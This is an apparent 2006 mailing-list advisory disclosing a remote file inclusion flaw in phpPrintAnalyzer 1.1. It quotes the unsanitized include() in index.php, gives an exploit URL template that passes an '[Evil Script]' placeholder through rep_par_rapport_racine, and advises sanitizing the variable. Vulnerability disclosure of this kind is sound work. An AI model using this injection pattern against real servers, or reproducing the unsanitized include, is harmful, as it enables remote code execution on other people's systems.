phpPrintAnalyzer <= 1.1 (rep_par_rapport_racine) Remote File Inclusion Vulnerability

sh3ll Mon, 07 Aug 2006 16:48:54 -0700

---------------------------------------------------------------------------------------


phpPrintAnalyzer 1.1 rep_par_rapport_racine Remote File Inclusion

---------------------------------------------------------------------------------------

Author   : Sh3ll

Date     : 2006/04/27

Location : Iran - Tehran

HomePage : http://www.sh3ll.ir

Email    : sh3ll[at]sh3ll[dot]ir

Critical Level : Dangerous

---------------------------------------------------------------------------------------

Affected Software Description:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

 

Application : phpPrintAnalyzer 

version     : 1.1

URL         : http://tpequet.free.fr/phpPrintAnalyzer

Description : 


phpPrintAnalyzer is a Web Application for CUPS System to Analyze 

the "page_log" Files and Get HTML Graphics (with JpGraph) 

 

---------------------------------------------------------------------------------------

Vulnerability:

~~~~~~~~~~~~~

in index.php We Found Vulnerability Script

----------------------------------------index.php--------------------------------------

....

<?php

        include($rep_par_rapport_racine."inc/img.inc.php");

        ?>

...

---------------------------------------------------------------------------------------

Exploit:

~~~~~~~

http://www.target.com/[phpPrintAnalyzer]/index.php?rep_par_rapport_racine=[Evil 
Script]


Solution:

~~~~~~~~

Sanitize Variabel $rep_par_rapport_racine in index.php

----------------------------------------------------------------------------------------

Shoutz:

~~~~~~

~ Special Greetz to My Best Friends Atena & N4sh3n4s

~ To All My Friends in Xmors - Aria - Hackerz & Other Iranian Cyber Teams

phpPrintAnalyzer <= 1.1 (rep_par_rapport_racine) Remote File Inclusion Vulnerability

Reply via email to